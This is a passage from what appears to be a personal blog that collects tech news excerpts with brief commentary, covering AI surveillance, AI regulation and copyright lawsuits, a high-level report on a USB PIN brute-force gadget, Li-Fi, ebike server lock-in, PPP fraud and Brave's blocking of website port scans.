Research group develops biodegradable film that keeps food fresh for longer

[…]

a film made of a compound derived from limonene, the main component of citrus fruit peel, and chitosan, a biopolymer derived from the chitin present in exoskeletons of crustaceans.

The film was developed by a research group in São Paulo state, Brazil, comprising scientists in the Department of Materials Engineering and Bioprocesses at the State University of Campinas’s School of Chemical Engineering (FEQ-UNICAMP) and the Packaging Technology Center at the Institute of Food Technology (ITAL) of the São Paulo State Department of Agriculture and Supply, also in Campinas.

The results of the research are reported in an article published in Food Packaging and Shelf Life.

[…]

Limonene has been used before in film for food to enhance conservation thanks to its antioxidant and anti-microbial action, but its performance is impaired by volatility and instability during the packaging manufacturing process, even on a laboratory scale.

[…]

“The films with the poly(limonene) additive outperformed those with limonene, especially in terms of antioxidant activity, which was about twice as potent,” Vieira said. The substance also performed satisfactorily as an ultraviolet radiation blocker and was found to be non-volatile, making it suitable for large-scale production of packaging, where processing conditions are more severe.

The films are not yet available for use by manufacturers, mainly because chitosan-based plastic is not yet produced on a sufficiently large scale to be competitive, but also because the poly(limonene) production process needs to be optimized to improve yield and to be tested during the manufacturing of commercial packaging.

[…]

More information: Sayeny de Ávila Gonçalves et al, Poly(limonene): A novel renewable oligomeric antioxidant and UV-light blocking additive for chitosan-based films, Food Packaging and Shelf Life (2023). DOI: 10.1016/j.fpsl.2023.101085

Source: Research group develops biodegradable film that keeps food fresh for longer

AI System Identified Drug Trafficker by Scanning Driving Patterns

Police in New York recently managed to identify and apprehend a drug trafficker seemingly by magic. The perp in question, David Zayas, was traveling through the small upstate town of Scarsdale when he was pulled over by Westchester County police. When cops searched Zayas’ vehicle they found a large amount of crack cocaine, a gun, and over $34,000 in cash in his vehicle. The arrestee later pleaded guilty to a drug trafficking charge.

How exactly did cops know Zayas fit the bill for drug trafficking?

Forbes reports that authorities used the services of a company called Rekor to analyze traffic patterns regionally and, in the course of that analysis, the program identified Zayas as suspicious.

For years, cops have used license plate reading systems to look out for drivers who might have an expired license or are wanted for prior violations. Now, however, AI integrations seem to be making the tech frighteningly good at identifying other kinds of criminality just by observing driver behavior.

Rekor describes itself as an AI-driven “roadway intelligence” platform and it contracts with police departments and other public agencies all across the country. It also works with private businesses. Using Rekor’s software, New York cops were able to sift through a gigantic database of information culled from regional roadways by its county-wide ALPR [automatic license plate recognition] system. That system—which Forbes says is made up of 480 cameras distributed throughout the region—routinely scans 16 million vehicles a week, capturing identifying data points like a vehicle’s license plate number, make, and model. By recording and reverse-engineering vehicle trajectories as they travel across the state, cops can apparently use software to assess whether particular routes are suspicious or not.

In this case, Rekor helped police to assess the route that Zayas’ car was taking on a multi-year basis. The algorithm—which found that the driver was routinely making trips back and forth between Massachusetts and certain areas of upstate New York—determined that Zayas’ routes were “known to be used by narcotics pushers and [involved]…conspicuously short stays,” Forbes writes. As a result, the program deemed Zayas’s activity consistent with that of a drug trafficker.

Artificial intelligence has been getting a lot of attention in recent months due to the disruptions it’s made to the media and software industries but less attention has been paid to how this new technology will inevitably supercharge existing surveillance systems. If cops can already ID a drug trafficker with the click of a button, just think how good this tech will be in ten years’ time. As regulations evolve, one would hope governments will figure out how to reasonably deploy this technology without leading us right off the cliff into Minority Report territory. I mean, they probably won’t, but a guy can dream, can’t he?

Source: AI System Identified Drug Trafficker by Scanning Driving Patterns

There is no way at all that this could possibly go wrong, right? See the comments in the link.

China sets AI rules – not just risk based (EU AI Act), but also ideological

Chinese authorities published the nation’s rules governing generative AI on Thursday, including protections that aren’t in place elsewhere in the world.

Some of the rules require operators of generative AI to ensure their services “adhere to the core values of socialism” and don’t produce output that includes “incitement to subvert state power.” AIs are also required to avoid inciting secession, undermining national unity and social stability, or promoting terrorism.

Generative AI services behind the Great Firewall are also not to promote prohibited content that provokes ethnic hatred and discrimination, violence, obscenity, or “false and harmful information.” Those content-related rules don’t deviate from an April 2023 draft.

But deeper in, there’s a hint that China fancies digital public goods for generative AI. The doc calls for promotion of public training data resource platforms and collaborative sharing of model-making hardware to improve its utilization rates.

Authorities also want “orderly opening of public data classification, and [to] expand high-quality public training data resources.”

Another requirement is for AI to be developed with known secure tools: the doc calls for chips, software, tools, computing power and data resources to be proven quantities.

AI operators must also respect the intellectual property rights of data used in models, secure consent of individuals before including personal information, and work to “improve the quality of training data, and enhance the authenticity, accuracy, objectivity, and diversity of training data.”

As developers create algorithms, they’re required to ensure they don’t discriminate based on ethnicity, belief, country, region, gender, age, occupation, or health.

Operators are also required to secure licenses for their Ais under most circumstances.

AI deployed outside China has already run afoul of some of Beijing’s requirements. Just last week OpenAI was sued by novelists and comedians for training on their works without permission. Facial recognition tools used by the UK’s Metropolitan Police have displayed bias.

Hardly a week passes without one of China’s tech giants unveiling further AI services. Last week Alibaba announced a text-to-image service, and Huawei discussed a third-gen weather prediction AI.

The new rules come into force on August 15. Chinese orgs tempted to cut corners and/or flout the rules have the very recent example of Beijing’s massive fines imposed on Ant Group and Tencent as a reminder that straying from the rules will lead to pain – and possibly years of punishment.

Source: China sets AI rules that protect IP, people, and The Party • The Register

A Bunch Of Authors Sue OpenAI Claiming Copyright Infringement, Because They Don’t Understand Copyright

You may have seen some headlines recently about some authors filing lawsuits against OpenAI. The lawsuits (plural, though I’m confused why it’s separate attempts at filing a class action lawsuit, rather than a single one) began last week, when authors Paul Tremblay and Mona Awad sued OpenAI and various subsidiaries, claiming copyright infringement in how OpenAI trained its models. They got a lot more attention over the weekend when another class action lawsuit was filed against OpenAI with comedian Sarah Silverman as the lead plaintiff, along with Christopher Golden and Richard Kadrey. The same day the same three plaintiffs (though with Kadrey now listed as the top plaintiff) also sued Meta, though the complaint is basically the same.

All three cases were filed by Joseph Saveri, a plaintiffs class action lawyer who specializes in antitrust litigation. As with all too many class action lawyers, the goal is generally enriching the class action lawyers, rather than actually stopping any actual wrong. Saveri is not a copyright expert, and the lawsuits… show that. There are a ton of assumptions about how Saveri seems to think copyright law works, which is entirely inconsistent with how it actually works.

The complaints are basically all the same, and what it comes down to is the argument that AI systems were trained on copyright-covered material (duh) and that somehow violates their copyrights.

Much of the material in OpenAI’s training datasets, however, comes from copyrighted works—including books written by Plaintiffs—that were copied by OpenAI without consent, without credit, and without compensation

But… this is both wrong and not quite how copyright law works. Training an LLM does not require “copying” the work in question, but rather reading it. To some extent, this lawsuit is basically arguing that merely reading a copyright-covered work is, itself, copyright infringement.

Under this definition, all search engines would be copyright infringing, because effectively they’re doing the same thing: scanning web pages and learning from what they find to build an index. But we’ve already had courts say that’s not even remotely true. If the courts have decided that search engines scanning content on the web to build an index is clearly transformative fair use, so to would be scanning internet content for training an LLM. Arguably the latter case is way more transformative.

And this is the way it should be, because otherwise, it would basically be saying that anyone reading a work by someone else, and then being inspired to create something new would be infringing on the works they were inspired by. I recognize that the Blurred Lines case sorta went in the opposite direction when it came to music, but more recent decisions have really chipped away at Blurred Lines, and even the recording industry (the recording industry!) is arguing that the Blurred Lines case extended copyright too far.

But, if you look at the details of these lawsuits, they’re not arguing any actual copying (which, you know, is kind of important for their to be copyright infringement), but just that the LLMs have learned from the works of the authors who are suing. The evidence there is, well… extraordinarily weak.

For example, in the Tremblay case, they asked ChatGPT to “summarize” his book “The Cabin at the End of the World,” and ChatGPT does so. They do the same in the Silverman case, with her book “The Bedwetter.” If those are infringing, so is every book report by every schoolchild ever. That’s just not how copyright law works.

The lawsuit tries one other tactic here to argue infringement, beyond just “the LLMs read our books.” It also claims that the corpus of data used to train the LLMs was itself infringing.

For instance, in its June 2018 paper introducing GPT-1 (called “Improving Language Understanding by Generative Pre-Training”), OpenAI revealed that it trained GPT-1 on BookCorpus, a collection of “over 7,000 unique unpublished books from a variety of genres including Adventure, Fantasy, and Romance.” OpenAI confirmed why a dataset of books was so valuable: “Crucially, it contains long stretches of contiguous text, which allows the generative model to learn to condition on long-range information.” Hundreds of large language models have been trained on BookCorpus, including those made by OpenAI, Google, Amazon, and others.

BookCorpus, however, is a controversial dataset. It was assembled in 2015 by a team of AI researchers for the purpose of training language models. They copied the books from a website called Smashwords that hosts self-published novels, that are available to readers at no cost. Those novels, however, are largely under copyright. They were copied into the BookCorpus dataset without consent, credit, or compensation to the authors.

If that’s the case, then they could make the argument that BookCorpus itself is infringing on copyright (though, again, I’d argue there’s a very strong fair use claim under the Perfect 10 cases), but that’s separate from the question of whether or not training on that data is infringing.

And that’s also true of the other claims of secret pirated copies of books that the complaint insists OpenAI must have relied on:

As noted in Paragraph 32, supra, the OpenAI Books2 dataset can be estimated to contain about 294,000 titles. The only “internet-based books corpora” that have ever offered that much material are notorious “shadow library” websites like Library Genesis (aka LibGen), Z-Library (aka Bok), Sci-Hub, and Bibliotik. The books aggregated by these websites have also been available in bulk via torrent systems. These flagrantly illegal shadow libraries have long been of interest to the AI-training community: for instance, an AI training dataset published in December 2020 by EleutherAI called “Books3” includes a recreation of the Bibliotik collection and contains nearly 200,000 books. On information and belief, the OpenAI Books2 dataset includes books copied from these “shadow libraries,” because those are the most sources of trainable books most similar in nature and size to OpenAI’s description of Books2.

Again, think of the implications if this is copyright infringement. If a musician were inspired to create music in a certain genre after hearing pirated songs in that genre, would that make the songs they created infringing? No one thinks that makes sense except the most extreme copyright maximalists. But that’s not how the law actually works.

This entire line of cases is just based on a total and complete misunderstanding of copyright law. I completely understand that many creative folks are worried and scared about AI, and in particular that it was trained on their works, and can often (if imperfectly) create works inspired by them. But… that’s also how human creativity works.

Humans read, listen, watch, learn from, and are inspired by those who came before them. And then they synthesize that with other things, and create new works, often seeking to emulate the styles of those they learned from. AI systems and LLMs are doing the same thing. It’s not infringing to learn from and be inspired by the works of others. It’s not infringing to write a book report style summary of the works of others.

I understand the emotional appeal of these kinds of lawsuits, but the legal reality is that these cases seem doomed to fail, and possibly in a way that will leave the plaintiffs having to pay legal fees (since in copyright legal fee awards are much more common).

That said, if we’ve learned anything at all in the past two plus decades of lawsuits about copyright and the internet, courts will sometimes bend over backwards to rewrite copyright law to pretend it says what they want it to say, rather than what it does say. If that happens here, however, it would be a huge loss to human creativity.

Source: A Bunch Of Authors Sue OpenAI Claiming Copyright Infringement, Because They Don’t Understand Copyright | Techdirt

Brute Forcing A Mobile’s PIN Over USB With A $3 Board

Mobile PINs are a lot like passwords in that there are a number of very common ones, and [Mobile Hacker] has a clever proof of concept that uses a tiny microcontroller development board to emulate a keyboard to test the 20 most common unlock PINs on an Android device.

Trying the twenty most common PINs doesn’t take long.

The project is based on research analyzing the security of 4- and 6-digit smartphone PINs which found some striking similarities between user-chosen unlock codes. While the research is a few years old, user behavior in terms of PIN choice has probably not changed much.

The hardware is not much more than a Digispark board, a small ATtiny85-based board with built-in USB connector, and an adapter. In fact, it has a lot in common with the DIY Rubber Ducky except for being focused on doing a single job.

Once connected to a mobile device, it performs a form of keystroke injection attack, automatically sending keyboard events to input the most common PINs with a delay between each attempt. Assuming the device accepts, trying all twenty codes takes about six minutes.

Disabling OTG connections for a device is one way to prevent this kind of attack, and not configuring a common PIN like ‘1111’ or ‘1234’ is even better. You can see the brute forcing in action in the video, embedded below.

 

Source: Brute Forcing A Mobile’s PIN Over USB With A $3 Board | Hackaday

100x Faster Than Wi-Fi: Light-Based Networking Standard Released

Today, the Institute of Electrical and Electronics Engineers (IEEE) has added 802.11bb as a standard for light-based wireless communications. The publishing of the standard has been welcomed by global Li-Fi businesses, as it will help speed the rollout and adoption of the  data-transmission technology standard.

Advantages of using light rather than radio frequencies (RF) are highlighted by Li-Fi proponents including pureLiFi, Fraunhofer HHI, and the Light Communications 802.11bb Task Group. Li-Fi is said to deliver “faster, more reliable wireless communications with unparalleled security compared to conventional technologies such as Wi-Fi and 5G.” Now that the IEEE 802.11bb Li-Fi standard has been released, it is hoped that interoperability between Li-Fi systems with the successful Wi-Fi will be fully addressed.

[…]

Where Li-Fi shines (pun intended) is not just in its purported speeds as fast as 224 GB/s. Fraunhofer’s Dominic Schulz points out that as it works in an exclusive optical spectrum, this ensures higher reliability and lower latency and jitter. Moreover “Light’s line-of-sight propagation enhances security by preventing wall penetration, reducing jamming and eavesdropping risks, and enabling centimetre-precision indoor navigation,” says Shultz.

[…]

One of the big wheels of Li-Fi, pureLiFi, has already prepared the Light Antenna ONE module for integration into connected devices.

[…]

Source: 100x Faster Than Wi-Fi: Light-Based Networking Standard Released | Tom’s Hardware

VanMoof ebike should be bricked if servers go down – fortunately security is so bad a rival has an app to allow you to unlock it

[…] an app is required to use many of the smart features of its bikes – and that app relies on communication with VanMoof servers. If the company goes under, and the servers go offline, that could leave ebike owners unable to even unlock their bikes

[…]

While unlocking is activated by Bluetooth when your phone comes into range of the bike, it relies on a rolling key code – and that function in turn relies on access to a VanMoof server. If the company goes bust, then no server, no key code generation, no unlock.

Rival ebike company Cowboy has a solution

A rival ebike company, Belgian company Cowboy, has stepped in to offer a solution. TNW reports that it has created an app which allows VanMoof owners to generate and save their own digital key, which can be used in place of one created by a VanMoof server.

If you have a VanMoof bike, grab the app now, as it requires an initial connection to the VanMoof server to fetch your current keycode. If the server goes offline, existing Bikey App users can continue to unlock their bikes, but it will no longer be possible for new users to activate it.

[…]

In some cases, a companion app may work perfectly well in standalone mode, but it’s surprising how often a server connection is required to access the full feature set.

[…]

Perhaps we need standards here. For example, requiring all functionality (bar firmware updates) to work without access to an external server.

Where this isn’t technically possible, perhaps there should be a legal requirement for essential software to be automatically open-sourced in the event of bankruptcy, so that there would be the option of techier owners banding together to host and maintain the server-side code?

[…]

Source: VanMoof ebike mess highlights a risk with pricey smart hardware

Yup, there are too many examples of good hardware being turned into junk because the OEM goes bankrupt or just decides to stop supporting it. Something needs to be done about this.

PPP fraud is ‘worst in history’: $200B stolen, splurged on Lamborghinis and bling

Tens of thousands of fraudsters splurged on Lamborghinis, vacation homes, private jet flights and Cartier jewelry by fleecing the PPP loan system in a $200 billion heist — and did it because the COVID loan scheme was so easy to milk.

Approximately $1.2 trillion was rushed through Congress in 2020 and 2021 in COVID bailout cash for businesses and spent on the Economic Injury Disaster Loan Program (EIDLP) and the Paycheck Protection Program (PPP) schemes.

But a new report from the Small Business Administration’s Office of Inspector General reveals an astonishing 17% vanished to fraud — an estimated total of $200 billion.

And the SBA says it estimates there are more than 90,000 “actionable leads,” while it has already prosecuted dozens — including a former New York Jets wide receiver, Josh Bellamy.

The spending spree on taxpayer dollars includes Donald Finley, owner of the now-shuttered Manhattan theme restaurant Jekyll & Hyde, who purchased a Nantucket home across from Dionis Beach with waterfront views with millions of dollars from PPP and EIDLP.

Finley faces up to 30 years in prison, and paying more than $3.2 million in restitution, plus a $1.25 million fine.

And experts say crooks created fake businesses or lied about their numbers of employees to get access to more free cash — because it was so simple to fleece the taxpayer.

“The fraud was so easy to commit. All of the information was self-reported and none of it was verified or checked,” Haywood Talcove of LexisNexis Risk Solutions told The Post.

“During the height of the pandemic, it was really hard to purchase [luxury] items like a Rolls-Royce, or a high-end Mercedes because you had people walking in with cash from the PPP program to purchase those items for whatever the dealer was asking,” Talcove said.

Justice might finally be catching up with some of the fraudsters: A total of 803 arrests have taken place as of May 2023 for pandemic fraud, the SBA said.

[…]

Source: PPP fraud is ‘worst in history’: $200B stolen, splurged on Lamborghinis and bling

Hollywood studios proposed AI contract that would give them likeness rights ‘for the rest of eternity’

During today’s press conference in which Hollywood actors confirmed that they were going on strike, Duncan Crabtree-Ireland, SAG-AFTRA’s chief negotiator, revealed a proposal from Hollywood studios that sounds ripped right out of a Black Mirror episode.

In a statement about the strike, the Alliance of Motion Picture and Television Producers (AMPTP) said that its proposal included “a groundbreaking AI proposal that protects actors’ digital likenesses for SAG-AFTRA members.”

“If you think that’s a groundbreaking proposal, I suggest you think again.”

When asked about the proposal during the press conference, Crabtree-Ireland said that “This ‘groundbreaking’ AI proposal that they gave us yesterday, they proposed that our background performers should be able to be scanned, get one day’s pay, and their companies should own that scan, their image, their likeness and should be able to use it for the rest of eternity on any project they want, with no consent and no compensation. So if you think that’s a groundbreaking proposal, I suggest you think again.”

In response, AMPTP spokesperson Scott Rowe sent out a statement denying the claims made during SAG-AFTRA’s press conference. “The claim made today by SAG-AFTRA leadership that the digital replicas of background actors may be used in perpetuity with no consent or compensation is false. In fact, the current AMPTP proposal only permits a company to use the digital replica of a background actor in the motion picture for which the background actor is employed. Any other use requires the background actor’s consent and bargaining for the use, subject to a minimum payment.”

The use of generative AI has been one of the major sticking points in negotiations between the two sides (it’s also a major issue behind the writers strike), and in her opening statement of the press conference, SAG-AFTRA president Fran Drescher said that “If we don’t stand tall right now, we are all going to be in trouble, we are all going to be in jeopardy of being replaced by machines.”

Source: Hollywood studios proposed AI contract that would give them likeness rights ‘for the rest of eternity’ – The Verge

Discussing The Tastier Side Of Desktop 3D Printing

[…]

After nearly a decade in development, Ellie Weinstein’s Cocoa Press chocolate 3D printer kit is expected to start shipping before the end of the year. Derived from the Voron 0.1 design, the kit is meant to help those with existing 3D printing experience expand their repertoire beyond plastics and into something a bit sweeter.

So who better to host our recent 3D Printing Food Hack Chat? Ellie took the time to answer questions not just about the Cocoa Press itself, but the wider world of printing edible materials. While primarily designed for printing chocolate, with some tweaks, the hardware is capable of extruding other substances such as icing or peanut butter. It’s just a matter of getting the printers in the hands of hackers and makers, and seeing what they’ve got an appetite for.

So, why chocolate? It’s a pretty straightforward question to start the chat on, but Ellie’s answer might come as a surprise. It wasn’t due to some love of chocolate or desire to print custom sweets, at least, not entirely. She simply thought it would be an easy material to work with when she started tinkering with the initial versions of her printer back in 2014. The rationale was that it didn’t take much energy to melt, and that it would return to a solid on its own at room temperature. While true, this temperature sensitivity ended up being exactly why it was such a challenge to work with.

[…]

 

Source: Discussing The Tastier Side Of Desktop 3D Printing | Hackaday

How AI could help local newsrooms remain afloat in a sea of misinformation – read and learn, Gizmodo staffers

It didn’t take long for the downsides of a generative AI-empowered newsroom to make themselves obvious, between CNet’s secret chatbot reviews editor last November and Buzzfeed’s subsequent mass layoffs of human staff in favor of AI-generated “content” creators. The specter of being replaced by a “good enough AI” looms large in many a journalist’s mind these days with as many as a third of the nation’s newsrooms expected to shutter by the middle of the decade.

But AI doesn’t have to necessarily be an existential threat to the field. As six research teams showed at NYU Media Lab’s AI & Local News Initiative demo day in late June, the technology may also be the key to foundationally transforming the way local news is gathered and produced.

Now in its second year, the initiative is tasked with helping local news organizations to “harness the power of artificial intelligence to drive success.” It’s backed as part of a larger $3 million grant from the Knight Foundation which is funding four such programs in total in partnership with the Associated Press, Brown Institute’s Local News Lab, NYC Media Lab and the Partnership on AI.

This year’s cohort included a mix of teams from academia and private industry, coming together over the course of the 12-week development course to build “AI applications for local news to empower journalists, support the sustainability of news organizations and provide quality information for local news audiences,” NYU Tandon’s news service reported.

“There’s value in being able to bring together people who are working on these problems from a lot of different angles,” Matt Macvey, Community and Project Lead for the initiative, told Engadget, “and that that’s what we’ve tried to facilitate.”

“It also creates an opportunity because … if these news organizations that are out there doing good work are able to keep communicating their value and maintain trust with their readers,” he continued. “I think we could get an information ecosystem where a trusted news source becomes even more valued when it becomes easier [for anyone] to make low-quality [AI generated] content.”

[…]

“Bangla AI will search for information relevant to the people of the Bengali community that has been published in mainstream media … then it will translate for them. So when journalists use Bangla AI, they will see the information in Bengali rather than in English.” The system will also generate summaries of mainstream media posts both in English and Bengali, freeing up local journalists to cover more important news than rewriting wire copy.

Similarly, the team from Chequeado, a non-profit organization fighting disinformation in the public discourse showed off the latest developments of its Chequeabot platform, Monitorio. It leverages AI and natural language processing capabilities to streamline fact-checking efforts in Spanish-language media. Its dashboard continually monitors social media in search of trending misinformation and alerts fact checkers so they can blunt the piece’s virality.

“One of the greatest promises of things like this and Bangla AI,” Chequeado team member Marcos Barroso said during the demo, “is the ability for this kind of technology to go to an under-resourced newsroom and improve their capacity, and allow them to be more efficient.”

The Newsroom AI team from Cornell University hope that their writing assistant platform will help do for journalists what Copilot did for coders – eliminate drudge work. Newsroom can automate a number of common tasks including transcription and information organization, image and headline generation, and SEO implementation. The system will reportedly even write articles in a journalist’s personal style if fed enough training examples.

On the audio side, New York public radio WNYC’s team spent its time developing and prototyping a speech-to-text model that will generate real-time captioning and transcription for its live broadcasts. WNYC is the largest public media station in New York, reaching 2 million visitors monthly through its news website.

“Our live broadcast doesn’t have a meaningful entry point right now for deaf or hard of hearing audiences,” WNYC team member, Sam Guzik, said during the demo. “So, we really want to think about as we’re looking to the future is, ‘how can we make our audio more accessible to those folks who can’t hear?’”

Utilizing AI to perform the speech-to-text transformation alleviates one of the biggest sticking points of modern closed-captioning: that it’s expensive and resource-intensive to turn around quickly when you have humans do it. “Speech-to-text models are relatively low cost,” Guzik continued. “They can operate at scale and they support an API driven architecture that would tie into our experiences.”

The result is a proof-of-concept audio player for the WNYC website that generates accurate closed captioning of whatever clip is currently being played. The system can go a step further by summarizing the contents of that clip in a few bullet points, simply by clicking a button on the audio player.

[…]

the Graham Media Group created an automated natural language text prompter to nudge the comments sections of local news articles closer towards civility.

“The comment-bot posts the first comment on stories to guide conversations and hopefully grow participation and drive users deeper into our engagement funnels,” GMG team member Dustin Block said during the demo. This solves two significant challenges that human comment moderation faces: preventing the loudest voices from dominating the discussion and providing form and structure to the conversation, he explained.

”The bot scans and understands news articles using the GPT 3.5 Turbo API. It generates thought-provoking starters and then it encourages discussions,” he continued. “It’s crafted to be friendly.”

Whether the AI revolution remains friendly to the journalists it’s presumably augmenting remains to be seen, though Macvey isn’t worried. “Most news organizations, especially local news organizations, are so tight on resources and staff that there’s more happening out there than they can cover,” he said. “So I think tools like AI and [the automations seen during the demo day] enable the journalists and editorial staff more bandwidth.”

Source: How AI could help local newsrooms remain afloat in a sea of misinformation | Engadget

The reason I cite Gizmodo here is because their AI / ML reporting is always on the negative, doom and gloom side. AI offers opportunities and it’s not going away.

New privacy deal allows US tech giants to continue storing European user data on American servers

Nearly three years after a 2020 court decision threatened to grind transatlantic e-commerce to a halt, the European Union has adopted a plan that will allow US tech giants to continue storing data about European users on American soil. In a decision announced Monday, the European Commission approved the Trans-Atlantic Data Privacy Framework. Under the terms of the deal, the US will establish a court Europeans can engage with if they feel a US tech platform violated their data privacy rights. President Joe Biden announced the creation of the Data Protection Review Court in an executive order he signed last fall. The court can order the deletion of user data and impose other remedial measures. The framework also limits access to European user data by US intelligence agencies.

The Trans-Atlantic Data Privacy Framework is the latest chapter in a saga that is now more than a decade in the making. It was only earlier this year the EU fined Meta a record-breaking €1.2 billion after it found that Facebook’s practice of moving EU user data to US servers violated the bloc’s digital privacy laws. The EU also ordered Meta to delete the data it already had stored on its US servers if the company didn’t have a legal way to keep that information there by the fall. As The Wall Street Journal notes, Monday’s agreement should allow Meta to avoid the need to delete any data, but the company may end up still paying the fine.

Even with a new agreement in place, it probably won’t be smooth sailing just yet for the companies that depend the most on cross-border data flows. Max Schrems, the lawyer who successfully challenged the previous Safe Harbor and Privacy Shield agreements that governed transatlantic data transfers before today, told The Journal he plans to challenge the new framework. “We would need changes in US surveillance law to make this work and we simply don’t have it,” he said. For what it’s worth, the European Commission says it’s confident it can defend its new framework in court.

Source: New privacy deal allows US tech giants to continue storing European user data on American servers | Engadget

Another problem is that the US side is not enshrined in law, but in a presidential decree, which can be revoked at any time.

Rolls-Royce won’t let customers buy another car if they sell its new EV for a profit

The first Rolls-Royce EV, the Spectre, is going on sale soon at a cool $425,000 — and at that price, purchasing slots will be limited, to say the least. But any buyers planning to flip one for a quick profit may want to think twice. CEO Torsten Müller-Ötvös said that any customers attempting to resell their Spectre models for profit will be banned for life from ever buying another Rolls-Royce from official dealers, according to a report from Car Dealer.

I can tell you we are really sanitizing the need to prove who you are, what you want to do with the car – you need to qualify for a car and then you might get a slot for an order,” he said. And anyone who violates the policy and sells the Spectre for a profit is “going immediately on a blacklist and this is it – you will never ever have the chance to acquire again.”

The British, BMW-owned company isn’t the first to impose bans on flipping its vehicles. Last year, GM said it would ban buyers from flipping Hummer EVs, Corvette Z06’s and other vehicles within 12 months under the threat of limiting the transferability of certain warranties. On top of that stick, it offered a carrot in the form of $5,000 in reward points for customers who kept their eighth-generation Corvette Z06’s for at least a year.

[…]

Source: Rolls-Royce won’t let customers buy another car if they sell its new EV for a profit | Engadget

Car dealers don’t like it, but with this much demand coupled with low supply, the car dealers are really blocked out of this product range anyway.

How An AI-Written ‘Star Wars’ Story Shows Yet Again the Luddism at Gizmodo

G/O Media is the owner of top sites like Gizmodo, Kotaku, Quartz, and the Onion. Last month they announced “modest tests” of AI-generated content on their sites — and it didn’t go over well within the company, reports the Washington Post.

Soon the Deputy Editor of Gizmodo’s science fiction section io9 was flagging 18 “concerns, corrections and comments” about an AI-generated story by “Gizmodo Bot” on the chronological order of Star Wars movies and TV shows. “I have never had to deal with this basic level of incompetence with any of the colleagues that I have ever worked with,” James Whitbrook told the Post in an interview. “If these AI [chatbots] can’t even do something as basic as put a Star Wars movie in order one after the other, I don’t think you can trust it to [report] any kind of accurate information.” The irony that the turmoil was happening at Gizmodo, a publication dedicated to covering technology, was undeniable… Merrill Brown, the editorial director of G/O Media, wrote that because G/O Media owns several sites that cover technology, it has a responsibility to “do all we can to develop AI initiatives relatively early in the evolution of the technology.” “These features aren’t replacing work currently being done by writers and editors,” Brown said in announcing to staffers that the company would roll out a trial to test “our editorial and technological thinking about use of AI.”

“There will be errors, and they’ll be corrected as swiftly as possible,” he promised… In a Slack message reviewed by The Post, Brown told disgruntled employees Thursday that the company is “eager to thoughtfully gather and act on feedback…” The note drew 16 thumbs down emoji, 11 wastebasket emoji, six clown emoji, two face palm emoji and two poop emoji, according to screenshots of the Slack conversation…

Earlier this week, Lea Goldman, the deputy editorial director at G/O Media, notified employees on Slack that the company had “commenced limited testing” of AI-generated stories on four of its sites, including A.V. Club, Deadspin, Gizmodo and The Takeout, according to messages The Post viewed… Employees quickly messaged back with concern and skepticism. “None of our job descriptions include editing or reviewing AI-produced content,” one employee said. “If you wanted an article on the order of the Star Wars movies you … could’ve just asked,” said another. “AI is a solution looking for a problem,” a worker said. “We have talented writers who know what we’re doing. So effectively all you’re doing is wasting everyone’s time.”
The Post spotted four AI-generated stories on the company’s sites, including io9, Deadspin, and its food site The Takeout.

Source: How An AI-Written ‘Star Wars’ Story Created Chaos at Gizmodo – Slashdot

If you look at Gizmodo reporting on AI, you see it’s full of doom and gloom – the writers there know what’s coming and allthough they are smart enough to understand what AI is, they can’t fathom the opportunities it brings, unfortunately. The way this article is written gives a clue: an assistant editor didn’t read the published article beforehand (the entitlement shines through, but let’s be clear, this editor has no right to second guess the actual editor), the job descriptions quote (who ever had a complete job description – and the description may have said simply “editing or reviewing” without the AI bit in there – and why should it have an AI bit in there at all?).

BMW’s Heads-Up Display Glasses Could Make You Feel Like a Motorcycle-Riding Cyborg

f you’ve ever been riding your motorcycle and thought it’d be cool to have a Terminator-like head-up display, giving you vehicle and navigation data, BMW has just the thing for you. They’re called the BMW ConnectedRide Smartglasses—smart sunglasses with a head-up display (HUD) built into the right lens.

For a smart pair of glasses, with a HUD built in, they aren’t too clunky looking. They’re obviously a bit thicker than a normal pair of glasses but they look pretty sleek, all things considered. Admittedly, they don’t have a camera built in, like Google Glass, and they only need to house a small lithium-ion battery pack and a tiny HUD projector.

The display is pretty small but it’s surprisingly comprehensive. Its shows outside temperature, speed, speed limit, gear, and turn-by-turn navigation. With the latter, users can choose either a simplified arrow or a detailed navigation screen with street names and exact directions. According to BMW, a full battery charge will last ten hours, which is more than enough for a day’s worth of riding.

BMW says that these glasses can be made to fit a variety of different head and helmet shapes, which is said to make them comfortable enough to wear for a full day. The pair also comes with two different lenses. One of which is 85 percent transparent and is designed to be used with helmets that have tinted sun visors. While the other lens is tinted, turning these into sunglasses. Prescription lenses can be fitted via an optician with an RX adapter.

[…]

Source: BMW’s Heads-Up Display Glasses Could Make You Feel Like a Motorcycle-Riding Cyborg

Brave to stop websites from port scanning visitors – wait that hasn’t been done by everyone yet?!

The Brave browser will take action against websites that snoop on visitors by scanning their open Internet ports or accessing other network resources that can expose personal information.

Starting in version 1.54, Brave will automatically block website port scanning, a practice that a surprisingly large number of sites were found engaging in a few years ago. According to this list compiled in 2021 by a researcher who goes by the handle G666g1e, 744 websites scanned visitors’ ports, most or all without providing notice or seeking permission in advance. eBay, Chick-fil-A, Best Buy, Kroger, and Macy’s were among the offending websites.

Some sites use similar tactics in an attempt to fingerprint visitors so they can be re-identified each time they return, even if they delete browser cookies. By running scripts that access local resources on the visiting devices, the sites can detect unique patterns in a visiting browser. Sometimes there are benign reasons a site will access local resources, such as detecting insecurities or allowing developers to test their websites. Often, however, there are more abusive or malicious motives involved.

The new version of Brave will curb the practice. By default, no website will be able to access local resources. More advanced users who want a particular site to have such access can add it to an allow list.

[…]

Brave will continue to use filter list rules to block scripts and sites known to abuse localhost resources. Additionally, the browser will include an allow list that gives the green light to sites known to access localhost resources for user-benefiting reasons.

“Brave has chosen to implement the localhost permission in this multistep way for several reasons,” developers of the browser wrote. “Most importantly, we expect that abuse of localhost resources is far more common than user-benefiting cases, and we want to avoid presenting users with permission dialogs for requests we expect will only cause harm.”

The scanning of ports and other activities that access local resources is typically done using JavaScript that’s hosted on the website and runs inside a visitor’s browser. A core web security principle known as the same origin policy bars JavaScript hosted by one Internet domain from accessing the data or resources of a different domain. This prevents malicious Site A from being able to obtain credentials or other personal data associated with Site B.

The same origin policy, however, doesn’t prevent websites from interacting in some ways with a visitor’s localhost IP address of 127.0.0.1.

[…]

“As far as we can tell, Brave is the only browser that will block requests to localhost resources from both secure and insecure public sites, while still maintaining a compatibility path for sites that users trust (in the form of the discussed localhost permission)” the Brave post said.

[…]

Source: Brave aims to curb practice of websites that port scan visitors | Ars Technica

This should not be a possibility!

Joby Aviation gets first passenger electric VTOL testing certification from FAA

